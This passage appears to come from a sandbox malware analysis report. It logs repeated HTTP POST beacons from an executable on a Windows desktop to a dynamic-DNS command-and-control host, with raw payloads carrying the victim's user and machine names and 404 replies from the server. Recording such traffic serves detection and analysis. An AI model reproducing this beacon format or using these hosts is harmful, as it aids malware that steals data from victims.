                                                        Oct 3, 2024 09:21:58.968790054 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:58 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.2.116440245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:21:59.146181107 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:21:59.151254892 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:21:59.912592888 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:21:59 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.2.116440345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:00.068260908 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:00.075267076 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:00.875777006 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:00 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.2.116440445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:01.038656950 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:01.051486015 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:02.986509085 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:02 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        60192.168.2.116440545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:03.152149916 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:03.157629013 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:03.927012920 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:03 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.116440645.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:04.103874922 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:04.115545034 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:04.921690941 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:04 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.2.116440745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:05.334078074 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:05.338912010 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:06.114370108 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:05 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.2.116440845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:06.277036905 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:06.283715963 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:07.060122967 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:06 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        64192.168.2.116440945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:07.216347933 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:07.225457907 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:07.996001959 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:07 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        65192.168.2.116441045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:08.302642107 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:08.313595057 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:09.068078041 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:08 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        66192.168.2.116441145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:09.225388050 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:09.230402946 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:10.003968000 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:09 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        67192.168.2.116441245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:10.326421022 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:10.331435919 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:11.079188108 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:10 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        68192.168.2.116441345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:11.234513044 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:11.239805937 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:12.003453970 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:11 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        69192.168.2.116441445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:12.165453911 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:12.172122955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:12.893414021 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:12 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        70192.168.2.116441545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:13.061347961 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:13.068984985 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:13.853063107 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:13 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        71192.168.2.116441645.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:14.003642082 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:14.008975029 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:14.776112080 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:14 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        72192.168.2.116441745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:14.930037022 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:14.936067104 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:15.763972998 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:15 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        73192.168.2.116441845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:15.921727896 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:15.929178953 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:16.667747974 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:16 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        74192.168.2.116441945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:16.822302103 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:16.827330112 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:17.525538921 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:17 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        75192.168.2.116442045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:17.698632956 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:17.703674078 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:18.554850101 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:18 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        76192.168.2.116442145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
